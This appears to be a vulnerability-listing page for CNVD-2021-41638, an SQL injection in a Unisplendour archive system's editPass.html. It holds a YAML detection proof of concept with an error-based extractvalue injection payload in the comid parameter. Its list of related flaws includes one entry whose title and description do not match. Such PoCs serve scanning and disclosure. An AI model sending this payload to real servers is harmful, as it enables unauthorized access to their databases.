CNVD-2021-41638: 紫光档案管理系统 editPass.html SQL注入

漏洞描述

PoC代码[已公开]

id: CNVD-2021-41638

info:
  name: 紫光档案管理系统 editPass.html SQL注入
  author: peiqi0
  severity: high
  verified: false
  description: |
    紫光软件系统有限公司（以下简称“紫光软件”）是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息
    app="紫光档案管理系统"

rules:
  r0:
    request:
      method: GET
      path: /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
    expression: response.body.bcontains(b'c4ca4238a0b923820dcc509a6f75849') && response.body.ibcontains(b'XPATH syntax error:')
expression: r0()

相关漏洞推荐

• 紫光档案管理系统任意文件读取漏洞 无POC

  2025-07-03 | 紫光档案管理系统
  紫光档案管理系统存在文件读取漏洞，攻击者在未授权的情况下可以读取服务器上的敏感文件，从而获取配置、凭据或用户数据，导致信息泄露甚至进一步入侵。

• 紫光档案管理系统敏感信息泄露漏洞 无POC

  2024-08-18 | 紫光档案管理系统
  紫光档案管理系统存在敏感信息泄露漏洞。

• 紫光档案管理系统SQL注入漏洞 无POC

  2021-09-13 | 紫光档案管理系统
  紫光软件系统有限公司（以下简称“紫光软件”）是中国领先的行业解决方案和IT服务提供商，成立于2001年7月25日，是紫光股份有限公司的全资子公司，紫光集团云网板块中的重要组成，业务涵盖软件与技术开发、...

• max-test-command-executor-rce: 紫光档案管理系统 upload.html 后台文件上传漏洞 POC

  2025-09-01 | max-test-command-executor-rce
  拓尔思 MAS testCommandExecutor.jsp测试文件存在远程命令执行漏洞，当网站运维者未删除测试文件时，攻击者通过漏洞可以获取服务器权限 "MAS媒资管理系统登录页面&qu...

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...